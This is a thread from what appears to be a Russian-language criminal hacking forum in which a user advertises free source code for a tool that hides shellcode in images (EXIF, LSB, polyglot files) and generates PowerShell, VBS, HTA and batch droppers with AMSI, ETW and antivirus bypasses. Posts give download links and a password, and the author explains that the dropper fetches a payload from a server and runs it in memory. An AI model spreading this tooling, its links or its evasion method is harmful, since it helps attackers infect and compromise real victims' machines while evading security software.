malware Скрывать эксплойты в изображениях STEGO_TOOL/DELIVERY_TOOL

[C2flow]

ПРАКТИЧЕСКОЕ ПРИМЕНЕНИЕ:
Скрывать эксплойты в изображениях
AMSI обходы - реальные техники обхода
ETW обходы - подавление логирования
Многоуровневая обфускация - 3 уровня защиты
Шифрование пейлоадов - в самих скриптах
Генерировать скрипты доставки:
PowerShell скрипты - самые совместимые
Batch файлы - стандарт Windows
HTML страницы - для браузерной доставки
VBS/HTA/REG/WMI - альтернативные форматы

Обходить антивирусы:
AMSI обходы - реальные техники обхода
ETW обходы - подавление логирования
Многоуровневая обфускация - 3 уровня защиты
Шифрование пейлоадов - в самих скриптах

Настраивать параметры:
Указывать свой сервер для загрузки
Работает офлайн - без интернета
Все форматы - JPEG, PNG, BMP, polyglot
Полное шифрование - AES-256, XOR, каскадное
Интеллектуальное извлечение - автоопределение метода
Выбирать тип пейлоада (шеллкод/исполняемый файл)

Создание изображения с shellcode
Скрывать данные в изображениях:
EXIF метод - прятать пейлоады в метаданных JPEG
LSB метод - встраивать данные в пиксели PNG/BMP
Polyglot форматы - создавать файлы с двойной интерпретацией

Защищать скрытые данные:
AES-256 шифрование
XOR шифрование - быстрое побитовое шифрование
Multi-layer шифрование - каскадное AES+XOR шифрование
Не задавайтесь вопросами почему бесплатно и зачем мне это нужно..
Подобного на форумах и на рынке нет

Скачать исходники: http://u.pc.cd/X42ctalK​

 

[C2flow]

GUI

 

[moshearmor]

отлично

 

[proexp]

GUI

DELIVERY_TOOL

не работает, при генерации выдает 1 кб код и на этом все.

Screenshot

Captured with Lightshot

prnt.sc

 

[C2flow]

DELIVERY_TOOL​

​

не работает, при генерации выдает 1 кб код и на этом все.​

​

Screenshot

Captured with Lightshot

prnt.sc

Работает. Значит что то не так делаешь. Ты создал vbs скрипт, он и не должен много весить. Все что он делает это через powershell командной качает с адреса сервера файл и исполняет его в памяти. Если это делать и скачивать таким образом изображение с внутри вшитым shellcode то 90% обход безопасности. AV, MSI , smart screen. 1 килобайт потому что это не бинарник а просто несколько предложений команда

 

[Brejnev]

а где софт то сам?

 

[proexp]

ПРАКТИЧЕСКОЕ ПРИМЕНЕНИЕ:
Скрывать эксплойты в изображениях
AMSI обходы - реальные техники обхода
ETW обходы - подавление логирования
Многоуровневая обфускация - 3 уровня защиты
Шифрование пейлоадов - в самих скриптах
Генерировать скрипты доставки:
PowerShell скрипты - самые совместимые
Batch файлы - стандарт Windows
HTML страницы - для браузерной доставки
VBS/HTA/REG/WMI - альтернативные форматы

Обходить антивирусы:
AMSI обходы - реальные техники обхода
ETW обходы - подавление логирования
Многоуровневая обфускация - 3 уровня защиты
Шифрование пейлоадов - в самих скриптах

Настраивать параметры:
Указывать свой сервер для загрузки
Работает офлайн - без интернета
Все форматы - JPEG, PNG, BMP, polyglot
Полное шифрование - AES-256, XOR, каскадное
Интеллектуальное извлечение - автоопределение метода
Выбирать тип пейлоада (шеллкод/исполняемый файл)

Создание изображения с shellcode
Скрывать данные в изображениях:
EXIF метод - прятать пейлоады в метаданных JPEG
LSB метод - встраивать данные в пиксели PNG/BMP
Polyglot форматы - создавать файлы с двойной интерпретацией

Защищать скрытые данные:
AES-256 шифрование
XOR шифрование - быстрое побитовое шифрование
Multi-layer шифрование - каскадное AES+XOR шифрование
Не задавайтесь вопросами почему бесплатно и зачем мне это нужно..
Подобного на форумах и на рынке нет

Скачать исходники: http://u.pc.cd/X42ctalK​

Скачать исходники: http://u.pc.cd/X42ctalK

 

[Brejnev]

Скачать исходники: http://u.pc.cd/X42ctalK

Выкидывает на главную страницу https://transfer.pcloud.com/ и всею Неужто норм ФО нет?

 

[exodus365]

Выкидывает на главную страницу https://transfer.pcloud.com/ и всею Неужто норм ФО нет?

Exploit.IN Send

Encrypt and send files with a link that automatically expires to ensure your important documents don’t stay online forever.

send.exploit.biz

Pass:exploit